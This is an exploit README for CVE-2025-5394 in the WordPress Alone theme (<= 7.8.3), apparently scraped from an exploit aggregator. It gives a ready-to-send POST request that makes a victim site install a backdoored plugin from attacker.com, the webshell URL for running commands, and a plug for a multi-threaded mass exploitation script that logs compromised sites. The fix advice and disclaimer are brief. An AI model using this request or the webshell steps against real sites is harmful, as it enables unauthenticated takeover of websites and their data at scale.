## https://sploitus.com/exploit?id=68A5F6B5-4DC3-52BE-8737-21A5809AD977
# CVE-2025-5394 โ WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation
๐ฅ **Vulnerability Summary**
The WordPress theme **Alone** versions <= 7.8.3 is vulnerable to an **unauthenticated arbitrary file upload** vulnerability. This flaw allows **unauthenticated attackers** to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint โ resulting in **remote code execution (RCE)** by deploying backdoored plugins.
This vulnerability stems from the `beplus_import_pack_install_plugin` function exposed to the public via `wp_ajax_nopriv_` without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.
๐ **Affected Theme**
- **Theme Name:** Alone โ Charity Multipurpose Non-profit WordPress Theme
- **Affected Version:** <= 7.8.3
- **Vulnerability Type:** Unauthenticated Arbitrary File Upload โ RCE
- **CVE ID:** CVE-2025-5394
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Full remote code execution (RCE) and full site compromise
๐งช **Exploit Features**
- ๐ **No authentication required**
- ๐ฆ **Uploads malicious plugin ZIP** directly from remote URL
- ๐ **Automatically installs and activates** the plugin
- ๐ **Webshell delivery supported** via embedded PHP in plugin
- โ **AJAX endpoint accessible by unauthenticated users:**
`/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin`
๐ง **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
๐ **Usage**
1. Prepare a malicious plugin ZIP file hosted on a server you control.
- Must contain a valid plugin header (`Plugin Name:`) and PHP backdoor (e.g., `bk.php`)
2. Craft the following POST request:
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
```
3. If successful, the plugin is installed and activated. Access your shell at:
```
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
```
๐งฐ **Mass Exploitation Script**
This repository includes a mass exploit tool with:
- Multi-threaded processing
- Automatic HTTPS prefixing (if missing)
- Live logging of successful targets to `result.txt`
See [`mass_beplus_exploit.py`](./mass_beplus_exploit.py) for details.
๐ **Fix Recommendations**
- Theme authors should remove or secure the `wp_ajax_nopriv_beplus_import_pack_install_plugin` hook.
- Implement authentication/capability checks (e.g., `current_user_can('install_plugins')`)
- Validate and restrict plugin sources.
- Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.
๐ **Disclaimer:**
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.
๐ **Reference:**
- [Wordfence Advisory โ CVE-2025-5394](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/alone/alone-charity-multipurpose-non-profit-wordpress-theme-783-missing-authorization-to-unauthenticated-arbitrary-file-upload-via-plugin-installation)
CVE: CVE-2025-5394
Researcher: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)